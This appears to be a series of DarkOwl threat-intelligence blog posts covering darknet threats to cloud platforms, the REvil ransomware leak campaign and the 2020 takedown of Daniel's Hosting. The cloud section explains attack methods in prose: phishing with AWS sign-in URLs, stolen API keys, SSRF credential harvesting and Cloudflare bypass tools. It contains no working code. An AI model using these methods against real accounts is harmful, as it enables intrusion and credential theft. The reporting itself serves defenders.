Author: DarkOwl Analyst Team

DarkOwl has investigated threats to cloud-based platforms and applications discussed on the darknet in order to identify threat actors that are specifically targeting cloud environments. Our investigation includes a broad range of cloud environments; from compromising personal iCloud accounts to hacking large-scale infrastructures such as Microsoft Azure and Amazon Web Services (AWS).

Attack Methodology

Understanding the attack vector against cloud-based platforms is the first step to understanding where to start the darknet research. Fortunately, there are many discussions across the information security community on technical approaches to penetrating a cloud-based network for malicious intention.

As with any information network, one of the simplest ways to gain access is through targeted social engineering and/or credential compromise. Social engineering AWS/Azure network users through the use of fabricated emails, calls or social media is a proven approach to obtaining user credentials. If a user has API keys for accessing the platform, general phishing techniques can be easily employed to gain access to the user’s computer and other accounts, where the attacker could then pull the API keys for said AWS user. One hacker emphasized the importance of learning as much as you can about a target organization in social engineering, highlighting that AWS is no exception. Threat actors target information such as AWS account ids, Amazon Resource Names (ARNs), IP addresses, Role Names, and other related AWS information in order to start an attack on the network [ref].

Some hackers have successfully employed sending SMS text messages to targeted network users. The SMS includes a malicious link that “appears to be a legitimate platform notification” for password reset, and in the process, the authentication credentials are captured.  Amazon includes a number of user-friendly URLs for accessing the AWS console or AWS SSO user panels. The following URLs could be adapted for targeted phishing or once the target name is identified the threat actor could attempt to brute force the legitimate links:

IAM User Sign-In Link (name):    https://name.signin.aws.amazon.com/console

IAM User Sign-In Link (account id):    https://accountid.signin.aws.amazon.com/console

AWS SSO Start Page:      https://name.awsapps.com/start

Other malicious threat actors, such as the hacker behind the RouteX Malware, have successfully accessed cloud accounts through the reuse of compromised account usernames and passwords and automated “credential-stuffing.”

Despite repeated warnings from the infosec community, it is well known that most people still continue to reuse passwords, jeopardizing the security of their cloud-based platform accounts. (Source: a136a0a1fb206b55f06084f100ab4cbc)

Methodology – API Keys

Some cloud services, like AWS, utilize API keys to allow technical users to connect and control cloud servers without a username and password. These are random, yet unique, strings of numbers and letters that allow the user to connect to the server. API keys are an easy starting point for compromising an AWS instance and the darknet contains thousands of such mentions. Telegram group MrChecker.net sells AWS keys for as cheap as 15 USD, while other hackers post stolen keys to darknet paste sites for future use. (Source: cbe876388ac06e2caddc6c69f516a310)

Some developers have accidentally committed their AWS EC2 access keys to file sharing websites like GitHub. According to open source reporting, clever threat actors are employing bots to persistently scan GitHub to find unprotected AWS access keys. 

One open-sourced tool widely disclosed was the Python script TruffleHog. In recent months, GitHub user, Crypto-Breaker, committed an entire repository called “My Arsenal of AWS Security Tools” that could easily be adapted for exploitation of AWS buckets. Some AWS users have argued that Amazon now actively searches GitHub for compromised committed secret keys, shutting down the potentially compromised account and notifying the user automatically before a large AWS bill could be accumulated by a malicious threat actor.

Attack Methodology – Third Party Software and Web Applications

One security researcher discussed in detail the exploitation of Server-Side Request Forgeries (SSRF) to conduct privilege escalation. A SSRF is an arbitrary web request from a compromised server to a target network. Making arbitrary requests against the target IP, e.g. replacing http(s):// with file://, can yield invaluable information like session keys and AWS container credentials. The IAM credentials can also be harvested through HTTP requests to a server’s meta_data URL and gain access to the same temporary credentials that the application uses. For example the URL:

will return a JSON object that contains an AWS access key ID, secret access key, and session token, which allows whoever made that request access to the AWS environment.

Coupling these techniques with tools like boto3, a python script for interacting with the AWS API, further malicious calls can be performed, including defacing the domain of the S3 website [source]. The Telegram channel, exploithub, discusses SSRF’s against Azure as well as other critical vulnerabilities in cloud-based platforms.

Attack Methodology – Malicious Injection

AWS and Azure both are vulnerable to CSV injection techniques to compromise cloud-based servers. Ready-Hacker-One includes Cross-site request forgery (CSRF) and CSV injection payloads in their “Everythingpayloads” GitHub (Source: f78043b645a4e1ce2c66e3aaf4783748) while Rhino Security details the features of the vulnerabilities in AWS and Azure in multiple open source reports. For example, the following command will download an executable from a remote server using PowerShell and then run it on the target user’s computer. The external web server is served over HTTP and automatically redirects to my malicious .exe file, because due to Azure’s validation, forward and backward slashes break this vulnerability [source].

Darknet forum user, Everest_RR, started a thread discussing how CSRF exploitation could produce credentials and a starting point for server-attack through over 100 Jenkins plug-ins (Figure 7). Plugin developers failed to enforce POST requests that prevent attacks using the CSRF token. These third-party plug-ins interact with most popular cloud-based architectures such as Twitter, AWS, VMware and Azure.

Azure Vulnerabilities on the Darknet

Hackers frequently discuss vulnerabilities on the darknet for various platforms. A recent Azure vulnerability, CVE-2019-1306, “Azure DevOps and Team Foundation Server Remote Code Execution Vulnerability” was explicitly posted to a hacker forum on the darknet by the user known by the moniker, PresidentXS. An attacker successfully exploiting this vulnerability allows for malicious code execution on an ADO service account.

Earlier this year, Russian hackers on the darknet forum Dublikat discussed Azure Stack vulnerabilities documented in CVE-2019-1234 (Source: d25c98cc06300c5a8e3dcbd1a6ebf606). Such discussion threads in DarkOwl Vision are useful for reviewing comments, exploring applications, and use cases for the vulnerability specifically.

In 2018, a user on a popular darknet security forum, Torum, expressed interest in attacking an online web server located on the Azure platform. The purpose of the forum thread was less to discuss the attack vector, but more for the solicitation of assistance in the venture. The user, badass888, listed a number of “illegal sports betting” software websites that they wanted to replicate, but the threat actor needed to hack Azure’s cloud platform to gain access to the website databases and source code. It is unclear from the comments whether the hacker managed to find help, but malicious intent is present.

Google Cloud

Google’s Cloud service “Google Drive” is also regularly targeted by threat actors on the darknet. One Russian forum user, “KeyBox,” recently offered an unlimited “Google Drive” monthly service that is cheaper than Google’s data storage plans. Their services are available on keybox.pp.ua and further discounts are on offer.

Это супер выгодно – по подписке 1000 Gb дискового пространства стоит около 1000 руб в месяц, а здесь вы платите один раз и получаете Безлимитный Google Drive.

Translation: This is super profitable – by subscribing 1000 Gb of disk space costs about 1000 rubles per month, but here you pay once and get Unlimited Google Drive.

CloudFlare

Another popular topic on the darknet is how to bypass “CloudFlare” website content delivery networks.

Cloudflare acts as an intermediary between a client and a server, often using a reverse proxy to mirror and cache websites. Cloudflare was established to track malicious cybercriminal behavior and prevent criminals from the originating server’s content.

 According to one darknet user, “CloudFlare is a big pain to us hackers.” Torigon user xData_ recently posted an informative thread on multiple CloudFlare bypass methods. The thread details tools for different platforms as well has host discovery methods, including SSL vulnerabilities and subdomains pointing back to the main host IP.

There are numerous tools readily available for bypassing CloudFlare protections. Most of the software is hosted on GitHub repositories and APIs. The Censys API is regularly referenced by threat actors to expose target IP address through the SSL certificate data. For example, once a list of potential origin servers (IPv4 hosts) has been obtained, some scripts will call each one of them and compute the similarity of the response with the response sent by the original domain, using a structural similarity function designed on purpose for comparing websites similar to the Levenshtein distance calculation.

Another extremely popular resource and regularly referenced cloudflare bypass  is “CloudFail” created by the hacker m0rtem. CloudFail is considered a “tactical reconnaissance tool” for target data collection. The script uses Tor to mask all requests and conducts misconfigured DNS scans with DNSDumpster.com. After the crimeflare.com database is also scanned for subdomains, the subdomains are brute forced. CloudFail is capable of attacking upwards of 2,500 subdomains at one time.

The subdomain discovery methods discussed in xData_’s thread are in full use as captured by multiple DarkOwl Vision results. There are several hundred examples like the figures below where the subdomain IP has been identified along with the CloudFlare protection flag (off or on). Another threat actor did a similar subdomain analysis of the social media platform Snapchat in late 2019. (Source: 42995a33628e79b929ee7708999f0ebc). Most results with the format: <<Subdomain IP Cloudflare>>, do not list an author; however, in November 2019, PostNL’s subdomains were exploited by a user with the moniker, ProxyManiac. This threat actor also identified some 300+ websites hosted on Bulletproof Hosting in another deep web data dump. (Source: 813aacb2d453e10ed8d0c2a2c9e63426)

iCloud

Personal Apple iCloud accounts are a popular target among darknet hackers. For example, one of the most popular questions observed by DarkOwl analysts active in underground chatrooms is “How do I hack my girlfriend’s iphone?”.  Torigon user, Roxy, recently posted a link to an iCloud bypass utility for accessing personal iCloud accounts. The software is advertised to work on iPhone models 5s to X. (Source: e456dc53f7840f85609783e97038156a)

Most Russian forums include service advertisements; like the August 2017 offer below by scriptseller2018. This advertisement detailed the steps for exploiting an Apple ID and iCloud account all packaged together and included in a script the hacker was selling on the forum (Source: bee9c6a7875239502c5e3115fdab144e)

Abuse of Cloud Resources

While not a direct threat to cloud subscribers, abuse of cloud resources is a concern for cloud providers, particularly for providers that offer IaaS (Infrastructure as a Service) and PaaS (Platform as a Service) models. The most prevalent way this occurs on the darknet is through the sale and usage of dedicated cloud servers, often referred to as “dedics”. There are many examples of users on the darknet that are offering these services.

One notable example is user extremalspeed, who posts advertisements for his services on Russian hacking forums such as Exploit.in and UFOLabs. Deep web forums such as Raidforums are also riddled with similar advertisements.

Organizations are not the only ones taking advantage of cloud computing; from cracking passwords and encryption keys to hosting exploits and stolen data, hackers are no longer limited to using their own hardware for malicious purposes. There are many tutorials posted to the darknet that describe how to take advantage of free credits offered by cloud providers. User therigbys, of now defunct “KICKASS” forum, notes that there are specific advantages to using Alibaba cloud for spamming purposes – “You can use the credit to own servers, they have quality IP, you can use to spam with little red flags.” Cloud providers are also being used to host phishing sites; Exploit.in forum member the-one expressed plans to host Office 365 phishing pages on Azure.

Selling Access to Personal Cloud Services

Some hackers sell access to their personal cloud of data dumps, such as DrDastan on Raidforums. This type of service is usually advertised as a subscription service and the seller usually claims to regularly post updates with fresh data.

Selling Access to Compromised Servers and Accounts

In recent years, hackers have made many headlines for selling access to an organization’s compromised servers and servers hosted on the cloud are no exception. The following two examples are from hacker forum Exploit.in. In the first example, threat actor Buffer is selling access to an education institute’s platform, which he claims gets 35 million visits per day. In the second example, threat actor onfrich is selling access to Azure server panels of a hospitality company.

In 2019, a user on deep web crime forum, sinister.ly using the moniker, momxia, posted an offer for Google Accounts with $100 USD credit.

The advertisement included multiple methods to contact them, along with a surface web link to their online store. According to their Selly Store located on the surface web, the Google cloud accounts were available for sale at the price of $6.00 USD. As of time of writing, the seller’s website indicated they were out of stock.

See this research featured in the newly released IBM’ X-Force Cloud Threat Landscape Report 2020

Curious to learn more about our darknet data? Have any questions for our analysts? Contact us.

Since first leaking highly-sensitive personal information pertaining to Lady Gaga, the threat actor group has since targeted Sherwood Food Distributors and Donald Trump. Our team has been monitoring the situation closely and will continue to update here as new developments arise.

UPDATES (LATEST JUNE 2, 2020)

REvil Hackers Begin Auctioning Compromised Data

While US cities degenerate into destructive police protests and rioting, the REvil hackers show no sign of slowing, adding more victims to their darknet website in recent days. They also introduced an “auction” feature to their website, with Canadian agriculture company Agromart Group’s data as their first lot, starting bids at $50,000 USD.

SODINOKIBI USED AGAINST AGROMART GROUP

Agromart Group is a Canadian agriculture company with offices in Ontario. The Happy Blog post for Agromart suggests the hack of the group of several companies (including Scotland Agromart Ltd.) likely occurred on or around 26 May 2020. The hackers state they have corporate documents and accounts with over 22,000 files and 3 databases. There are several accounting spreadsheets included in the screenshots included as evidence of the legitimacy of the attack. The spreadsheet appears to consist of a list of Agromart’s customers and their orders. There was also a document labeled “Personal Net Worth Statement” with details of an employee’s personal financial information. It’s unclear whether or not this attack has or will impact Canada’s farming industry.

Early Tuesday morning, the hackers debuted an “auction” section of their darknet blog featuring Agromart, indicating a divergence from the Russian Jokerbuzz darknet auction hidden service mentioned in the Grubman Shire announcement. The minimum deposit in Monero (XMR) is $5,000 USD with a suggested starting price for the files and databases of $50,000 USD. The auction’s “blitz” price is $100,000 USD and will last only a week. The hackers also included links to purchase the Monero cryptocurrency, preferring Monero to Bitcoin transactions.

TELECOMMUNICATIONS AND ENERGY FIRMS NOT IMMUNE

Hackers also posted links to South African telecommunications and mobile phone provider, Telkom, as well as British energy reporting and accounting company, Elexon. The announcement for Telkom’s hack was brief while the hackers included a link to “sample” files from Elexon’s corporate network and multiple screenshots. One included a renewal application form for CFC’s Cyber Private Enterprise, suggesting the company held an insurance policy for such a cyber attack.

According to their public website, Elexon admitted the attack on their internal networks occurred on 14 May 2020 and there was no risk to the public or loss of customer-level data.

Several Law Firms Added in Recent Days

The REvil hackers also debuted hacks from additional US law firms: Indiana-based Wartman Law Firm and Fraser Wheeler and Courtney LLP in Louisiana. The post for Wartman indicates there are several hundred folders of customer and client data compromised and the law office has a week to respond with payment. The hackers state the Fraser Wheeler and Courtney data leak is over 50 GB with a repurchase price of $100,000 USD.

As of this update, DarkOwl has observed 41 data leaks posted to the REvil / Sodinokibi ransomware hackers “Happy Blog.” The post numbering system is up to 76, and we assess there are a large number of corporate victims either not yet mentioned or paid the ransom and avoided public inclusion to the darknet blog.

Given the volume and frequency of new postings, the threatening language used on recent public announcements and the latest introduction of the “auction” feature to their website, it is evident the hackers are feeling more emboldened and confident in the success of their extortion endeavors.

DarkOwl also discovered that a previous victim’s data, the National Eating Disorders Association (NEDA) archived by DarkOwl Vision in late March yet since removed from the Happy Blog, has recently appeared on a darknet marketplace not previously assessed to have affiliation with the REvil hackers.

A vendor using the moniker, “eternos” registered to ASEAN market in early May and the listing for the NEDA association’s database appeared shortly thereafter for as little as $99 USD. There is no intelligence to suggest “eternos” is associated with the REvil hackers, as the database could have been collected by an independent darknet group from links shared earlier on REvil’s Happy Blog or harvested from the NEDA network completely independent of the REvil ransomware attack of the organization.

New Targets Announced over Memorial Day Weekend

While the US celebrated Memorial Day weekend, the REvil/Sodinokibi hackers continued to target corporations around the globe. On Monday, May 26, 2020, the hackers announced another new victim, a law firm called Vierra Magen Marcus LLP. The hackers posted then announced their next new target, Titan Entertainment, late Tuesday, May 27, 2020. Since DarkOwl Vision’s first capture of the “Happy Blog” V3 hidden service in late February 2020, we know of at least 32 victims of the Sodinokibi ransomware since the website launched, an average of 2.6 successful infections worth public disclosure per week.

VIERRA MAGEN MARCUS LLP

Vierra Magen Marcus LLP is another California-based intellectual property law firm with an extensive client lists across “Technology, Science, and Growth Enterprises.” The hackers refer to their extorted archive including 1.2 terabytes of documents including patents, non-disclosure agreements, and conflict resolution legal documents.

TITAN ENTERTAINMENT

Late Tuesday, the hackers added another Victim, Titan Entertainment, based out of London, UK with only the URL for the company’s website and the text, “download- Will be soon…” The screen capture provided by the hackers appears to include a list of servers from the company and their associated backups along with internal IP addresses of the compromised systems. As of time of writing, the website URL for Titan Entertainment listed on the Happy Blog is unresponsive.

FARO Technologies, a Leading 3D Printing/Manufacturing Company, is Latest Victim of REvil Hackers’ Ransomware Attacks

UPDATE: As of May 27th, Happy Blog no longer contains the post discussed below, suggesting FARO may have paid the ransom demands.

On May 20th, sometime between 11:31 MST and 2:38 MST, the hacking group known as REvil posted an announcement to the darknet forum Happy Blog stating that they had identified and compromised a new target, FARO Technologies. The hackers stated that FARO Technologies has 24 hours to pay their ransom demands, or they would leak 1.5 TBs of FARO’s data to the public. It is unclear how files REvil has total.

This announcement comes as the hackers continue to target the high-profile law firm Grubman Shire Meiselas & Sacks – and leak highly sensitive data pertaining to their celebrity clientele.

Per their website, FARO is the world’s most trusted source for 3D measurement, imaging and realization technology. The company develops and manufactures leading edge solutions that enable high-precision 3D capture, measurement and analysis across a variety of industries including manufacturing, construction, engineering and public safety. 

Sometime after making this initial announcement, REvil updated their post to state they were giving FARO Technologies an additional 20 hours due to “a minor technical issue.” Then, in a subsequent post, they stated the following:

“FARO Technologies has exactly 3 hours, after which we will publish a link to the data here. FARO Technologies, if you do not know where to find the instructions, contact your employee [redacted]. He has already visited website, seen the instructions and knows what to do.”

On May 21st, REvil published the below announcement claiming that FARO had failed to meet their ransom demands, including a link to the data files. It is unclear what measures each party took to remediate this situation, though it appears that at some point, FARO’s parent company became involved. To our knowledge, REvil has never stated how much money they have demanded of their hostage.

Items of note in the file-tree shared as a preview of what will allegedly be included in the 1.5 TB data drop include: IT audits, forensic information pertaining to public safety, global research and development files, legal records, and user data. 

REvil Announces Next Target will be Madonna and Claims They’ve had Offers for Buyers for Trump Data

May 18: Just before 7:00PM UTC, DarkOwl Analysts observed an update to Happy Blog with the following announcement. In it, REvil states that Madonna is their next target, and that they will be auctioning off her personal files on the 25th of May. There is no reference to the ongoing ransomware attack they have conducted on Grubman Shire Meiselas & Sacks (GSM), indicating the hackers may be pivoting their approach to making a profit off of selling the personal data of high net worth individuals (instead of just attempting to exploit GSM with ransomware payments).

The hackers are starting the bidding for Madonna’s confidential data at $1 Million dollars.

The hackers also stated that they have far more information pertaining to Donald Trump than was released in their initial drop, and that they have received several offers from buyers who want the full extent of the information REvil has “accumulated” over time.

In the second press release they published, they address the fact that they have been accused of “bluffing,” maintaining that the full extent of the information they have on Trump is damaging and will lead to public disgrace and financial loss.

REvil also outlines how they do not plan to cease their ongoing Ransomware attack, but do plan on profiting from the money they can make from selling individual client data – regardless of whether GSM has paid their ransom demands.

ORIGINAL POST:

Hollywood Law Firm Hacked; Personal Data of High Profile Individuals Exposed

On May 11, 2020, lawyers for the Hollywood elite, Grubman Shire Meiselas & Sacks (GSM) confirmed publicly they were in the midst of a cyber ransomware attack, with hackers holding hostage some 756 GB of sensitive client data, contracts, and personal information harvested from their main website server, www.gsmlaw.com, which remains offline.

The hackers, believed to be from Eastern Europe, demanded a ransom of $21 Million USD putting the law firm and their clients in a precarious position during already stressful times due to the COVID-19 pandemic.

Despite where the owners of the law firm are in negotiation with the hackers and whether or not the FBI has become directly involved, the hackers have already started publishing data from the ransomed servers on the darknet. DarkOwl analysts discovered a Tor hidden service the hackers maintain called “Happy Blog.” It was there that they announced their hack of the GSM hack in early May, and continues to be where the group routinely publishes updates. The hackers’ announcement lists many of GSM’s exclusive clients such as: Madonna, Facebook, Elton John, Barbara Streisand, and Lady Gaga along with 9 inactive, but prepared links for separate data leaks.

The underground website also includes screen captures of over 176 folders listed on the compromised server and what appears to be signed contracts and agreements from Christina Aguilera in 2013 and Madonna’s World Tour 2019/20. There are numerous other famous actors and musicians from Hollywood mentioned.

Lady Gaga Data Exposed

DarkOwl analysts also discovered the first of the 9 data leaks had been released at 2:00pm UTC on Thursday, May 14, 2020 and included over 2 GB of data related to entertainer, Lady Gaga, due to release a new album at the end of the month. Along with the data leak, the hackers updated the website to state, “we public the first part of the data because the time is up” (confirming that English is not their native language).

A review of the data revealed there exists over 3,000 files across 350 folders which includes but is not limited to: W9 forms, expense reports, producer agreements, certificates of engagements, and confidentiality agreements over the last decade. Of particular concern is the folder listed, “Gaga Medical Confidentiality Agreements” that most likely includes some of the most personally identifiable information for the mega entertainer, such as her social security number.

The Next High Profile Individual Data-Drop: Donald Trump

On May 14, 2020, the hackers responded even more seriously, doubling the ransom in a new message stating, “The ransom is now [doubled to] $42,000,000 … The next person we’ll be publishing is Donald Trump. There’s an election going on, and we found a ton of dirty laundry on time.” According to PageSix, the hackers added, “Mr Trump, if you want to stay president, poke a sharp stick at the guys, otherwise you may forget this ambition forever. And to you voters, we can let you know that after such a publication, you certainly don’t want to see him as president … The deadline is one week.”

DarkOwl Analysts have confirmed that the second drop did contain information pertaining to Donald Trump. While he was not a client of GSMs, there were leaks of associates of his that reference him, as well as leaked correspondences between GSM and other clients in which either Trump or Trump’s Entertainment holding company were mentioned.

Since Trump was not a client of GSM, the second REvil drop is not like Lady Gaga’s, and his personal files were not made public in any way. Regardless, DarkOwl analysts are currently in the process of reviewing the leaked correspondences for items of note. This blog will be updated accordingly as we do so.

REvil Announces New Target: Sherwood Food Distributors, LLC

UPDATE: As of (approximately) May 20th, Happy Blog no longer contains the post discussed below, suggesting Sherwood may have paid the ransom demands.

The same group of hackers who just released highly sensitive data relating to Lady Gaga as a part of their ongoing extortion attempt of Grubman, Shire, Meiselas and Sacks have posted on the darknet that they are holding another company for ransom – Sherwood Food and Harvest Distributors. The threat actors posted a notice about their new target around 3pm MST 5/15.

This notice contained a link to download a portion of Sherwood’s proprietary files as “previews” which they plan on releasing one at a time (8 in total). The first link to leaked information contains roughly 2,300 files. These files contain highly sensitive data including cash-flow analysis, sub-distributor info, detailed insurance information, proprietary vendor information – including for that of Kroger, Albertsons, Sprouts – scanned drivers license images for drivers in their distribution networks, etc. The threat actors also posted a conversation they had with Coveware, a leading ransomware mitigation company, dating back to at least May 3rd.

This shows Sherwood has been aware of and dealing with this attack for over a week, and had not made this information public. While the threat actors only posted Coveware’s side of the conversation, it is clear that Coveware attempted to negotiate by acting as a middleman between Sherwood, their board, and the attackers. Also of note is that Grubman, the law firm, also utilized Coveware’s services, which is worth keeping in mind considering these are two supposedly unrelated companies/targets.

Who are these Hackers?

According to open source reporting, the hackers responsible for the ransomware are reportedly known as REvil or Sodinokibi, who infamously attacked foreign exchange company, Travelex late last year with similar ransomware. Travelex paid the hackers $2.3 Million of the $6 Million USD in ransom demanded.

There are several mentions of the ransomware developers across English and Russian speaking darknet forums and marketplaces.

• The hackers sponsored a hacking competition worth $15,000 on darknet forum, XSS in January 2020, according to multiple sources.

• In April 2020, BleepingComputer and numerous darknet news sources also confirmed the ransomware hackers would from now on only accept Monero for their ransoms, as they believed, quite confidently that Bitcoin was traceable by law enforcement.

• The hackers are believed to have also authored GandCrab, a popular ransomware as a service (RaaS) that circulated the internet from January 2018 until May 2019, when the hackers suddenly announced they were shutting down their operations.

The Sodinokibi ransomware authors and their associates have been widely distributing the ransomware through infected Javascript on WordPress websites. Upon installation on the victim machine, it deletes all Shadow Volume Copies, disables the Startup repair in Windows and then begins encrypting all the files on the system hard drive.

Once the malware completes its encryption process, Sodinokibi modifies the desktop wallpaper, adding a ransom note, which contains instructions about the decryption process. The ransom note also includes instructions on how to make the payment to have the files decrypted, including unique keys and links to the payment site (likely Monero).

Reception to REvil’s latest antics have not been great. Members of XSS forum have expressed displeasure to how much attention this has brought them, posting:

DarkOwl Analysts continue to dig into this hacking group to see what we can uncover. Stay tuned for updates as we will continue to update this blog with new findings.

On March 10th 2020, hackers targeted one of the most prominent anonymous website hosting providers on the darknet, Daniel Winzen, subsequently knocking over 7,500 hidden services across Tor offline. DarkOwl analysts, who regularly monitor the darknet directly, observed this event occur via DarkOwl’s Vision platform and have spent recent days reviewing what happened to quantify the impact to the darknet.

Editors note: the following report contains explicit language and references sensitive material.

Who is Daniel Winzen?

Daniel Winzen, also known as “DanWin” or @daniel, has been a major player in the darknet community for at least the last five years. The German 20-something-year old has long provided hosting and directory services as well as e-mail and communication mediums like Jabber+XMPP and a PHP-based anonymous chat built on the LE code-based chat platform across Tor and I2p.

Winzen has been applauded by some for consistently providing the technical services he has, while others have criticized him for facilitating the distribution of illegal content from scammers and pedophiles.

Target: Daniel’s Chat SQL Database

Around 01:00 UTC in the early hours of March 10th 2020, members present in Daniel’s Chat were surprised to see their super admin, @daniel online. Since the last attack against Daniel’s Hosting services in November 2018, @daniel rarely visited the chatroom, blaming member-infighting and a busy work schedule. It took no time to notice that the topic for the chatroom had been modified to “ALL YOUR BASE ARE BELONG TO US. ALL SHALL BOW BEFORE ME OR FACE MY WRAITH” [sic] and @daniel was not actually commanding his account in the chatroom.

A guest account, using the moniker @null was rapidly promoted to an administrator role, who kicked staff and members out of the chatroom and promoted another guest account with the moniker, @Pickle. The new admin, @null, had little to say, but did post an all-caps declaration positioning themselves “king” and demanding everyone “bow” to them.  

Then, at 02:51 UTC, a chat user named @Dolly emerged without “entering,” stating that the hackers stole @daniel’s chat password and that the server itself had not been compromised. @Dolly also said, “Doesn’t look like you can delete @Syntax” suggesting that @Dolly was likely an alternate account for the chatroom’s controversial super administrator, @Syntax. She also confirmed that @daniel was not logged in as he was not usually awake this early to do so.

@Dolly’s arrival prompted dialogue between the hacker @null and chatroom users, while @Syntax expressed less interest in fighting and was more interested in discussing the “reasoning” behind the hack.

At one point, @Dolly commends the alleged responsible parties by saying“I’m kinda in awe as to what you did.”

For the next hour, @Syntax along with various guests and transient members chatted about random subjects ranging from EU and German laws around pedophilia to the 19th Amendment, while random trolls entered and continued to attack only @Syntax directly. One chat member and presumed online boyfriend of @Syntax, known by the moniker @Fuggles, joined the chat and had little to say.

One guest to the chatroom suggested the hack was organized by @Syntax to breakup with @Fuggles, while another long-time user and former staff of Daniel’s Chat, known as @meerkat simply hypothesized that the hacker @null and @Syntax were one and the same person – essentially alleging that this was orchestrated from the inside.

By 04:00 UTC, the hacker kicked @Syntax and all guests using variations of her nickname from the room. Less than 10 minutes later, @null stated Daniel’s Chat was the last site left on Daniel’s Hosting. This suggests that while everyone was conversing, the hacker/s were busy deleting the web services hosted on Daniel’s servers by elevating the privileges of @daniel’s admin account. We find this to be at least partially true as it appears that the hackers targeted Daniel’s databases via the chatroom and not the web server content, like raw HTML and CSS files.

At 04:31 UTC, Daniel’s account simply announced, “pwned.” At 04:32 UTC, the chatroom returned displaying the message, “Fatal error: No connection to database!”- suggesting the hack was complete and the chat database was no longer online. 

The method and the justification

Less than 5 minutes after the chatroom went offline, a single post appeared on the drama and spam-filled Tor hidden service, DeepPaste, with the hackers blaming staff pedophiles and Syntax directly for the attack against Daniel’s services. The hackers also included a link to another external hidden service on Tor with a list of all the filters from the admin panel in the anonymous chatroom. It is rumored staff moderators used the extensive list of filters, consisting of mostly keywords and URLs linked to illegal subject matter, for auto-kicking guests posting banned content. 

The reason for posting this – along with their final statement – is unknown and the service containing the filters is no longer online.

A couple of hours after the hack, user @meerkat posted to another Le-Chat on Tor that he had confirmed with Daniel via his friend Adriane that his administrator password had been simply brute forced. Given @daniel’s limited involvement, he expressed skepticism the chatroom would ever return.

The Hacker @null and the Accomplice @Pickle

Little is known about @null or @Pickle in the Daniel’s Chat community, as the nicknames were not previously registered as members on the chat. While @null entertained questions from @Dolly/@Syntax about how the attack was conducted, @Pickle made only three statements over the last 30 minutes that the chat was online.

Using Vision, DarkOwl analysts uncovered lengthy history for both monikers (null and Pickle) in the underground community known as Kiwi Farms.

Kiwi Farms, formerly known as CWCki, has been on the surface web since 2013 and archived by DarkOwl on Tor since October 2017. It was set up by a Joshua “Null” Moon as an exclusive image board for trolling and harassing an autistic transgender web comic artist, but has since involved into a dedicated discussion board for “lolcows” including stalking and doxing of public and internet figures.

The content on Kiwi Farms is consistent with typical chanboard-like discussions. There are reoccurring anti-pedophilia threads and general disdain for FBI honey-pots. There are very few technology or hacking focused threads on the Kiwi Farms forum.

In November 2019, darknet hackers targeted Kiwi Farms leaking their member and conversations database on the popular forum, RaidForums, possibly giving the staff and members of the community at Kiwi Farms justification for a cyber-based retaliation.

Despite the leak in 2019, the evidence connecting Kiwi Farms to the hack of Daniel’s earlier this year is extremely weak and circumstantial. Kiwi Farms has over 50,000 registered users and several prominent members include “Pickle” in the moniker, e.g. long-time member “Pickle Inspector,” but DarkOwl analysts were unable to connect these, nor their administrator “Null”, to the hackers of Winzen’s services.

Unfortunately, “null” is also a common moniker observed in recent years on popular darknet cybersecurity forum, Torum. In late 2018, “null” posted a course on social engineering, written as CURSE OF ENG.SOCL.

The thread was not well-received, nor did the member “null” post that frequently, having less than a dozen posts on the forum since their registration in September 2018.

Did GhostSec send a warning a week prior?

On March 3rd 2020, a guest by the name of @Sebastian entered Daniel’s Chat and stated “GhostSec is watching you,” adding that they had taken control of discord servers of Daniel’s – servers that members in the chat didn’t know he even had.

Shortly before getting kicked from the room, @Sebastian posted a fingerprint and claimed Daniel was compromised while accessing child pornographic content called, Tiny Voices. Sebastian is also the moniker and name of the leader of the anti-pedophilia hacking group formerly known as Ghost Security (#GhostSec). Sebastian Dante Alexander, who uses the Twitter handle, @SebastianDant13, is a vigilante hacker known for tracking and de-anonymizing criminals who harm children.

An organized hacking collective like GhostSec definitely has the capabilities and motivation to take down Winzen’s servers, especially if there was questionable content hosted and shared, but the group has not published any declaration or claim of responsibility for the hack, like they have with other groups and individuals they’ve targeted in the past.   

Daniel’s response

As soon as Daniel was alerted to the hack, he posted a notification to his main website confirming what was suspected. The hackers deleted all databases related to his hosting platform and all users should consider their data leaked and passwords compromised. 

He further stated the remaining 390GB of data from the websites he hosted would only be available until the 25th of March and recommended his customers use Freedom Hosting Reloaded or OneHost as he had no intention of restarting his hosting project.

Daniel followed up with an update on March 11th 2020, giving users more details on archiving what was left of their website data. Winzen referred to the flood of messages encouraging him to keep going with the hosting service, but Daniel stated that keeping his servers clean from scammers took time from development and projects he enjoyed. He left the option open, months down the road, but not until he found time to improve the current platform.

No database backups

Speaking of server setup, strangely, Winzen did not maintain any archives of the SQL databases he hosted as evident by data loss, nor were backups of the deleted databases available when he was hacked previously in late 2018. Many darknet users have expressed increasing skepticism that Daniel was not as committed to his darknet projects as he would have liked everyone to believe. After the most recent database breach, one anonymous user suggested that @null’s reference to the chatroom being a honey-pot was legitimate, adding suspicion over a server upgrade or move occurring only weeks before the most recent attack occurred.

Those who suspect that Daniel’s chatroom was actually a honey pot surmise that Daniel didn’t maintain backups of his data because they were being monitored (and probably managed) by international or German law officials. This was supported by the fact that a change in rule regarding sharing any pornographic content occurred in 2018, around the same time that Daniel was hacked and their databases disappeared.

There have been numerous pastes circulated around the darknet in the last year claiming many of the members, including @Syntax were Law Enforcement.

Daniel’s link list is lost

While the takedown of Daniel’s Chat and Hosting have received significant attention, another item that was compromised during this time was Daniel’s Onion Link List.

Winzen maintained a seed list of Tor hidden services, along with a status indicator and topical classifier that was helpful for those exploring the darknet regularly. This list of links was referred to by hundreds of other sites across Tor.

Now, Daniel’s Onion link list returns a 504 Gateway Time-Out error.

DarkOwl analytical look

After the last hack in November 2018, it took Winzen almost two months to re-deploy his hosting services. On January 6th 2019, Winzen posted a happy new year and hosting message indicating his hosting services were back online.

By January 10th, 2019, a mixture of over 1,400 darknet domains and subdomains appeared operational. This initial count of domains was determined by not only the domain name themselves, but careful review of the content of sites hosted by Winzen prior to and after the November 2018 hack.

Notably, DarkOwl Vision data shows an increase of over 7,600 domains affiliated with the hosting provider over the course of the 2019 calendar year.

In DarkOwl’s quantitative Map The Dark internal reports, domains are topically tagged as being associated with Daniel’s hosting if, 1. The domain URL was discovered on the public “List of Hosted Sites” on Daniel’s hosting or if, 2. The website contained the phrase “Site Hosted by Daniel’s Hosting,” as has been observed with most newly published darknet hidden services. As of March 9th 2020, DarkOwl had observed 9,006 domains or sub-domains affiliated with Daniel’s hosting, 7,555 of which were recorded as online during the first two weeks of March 2020.

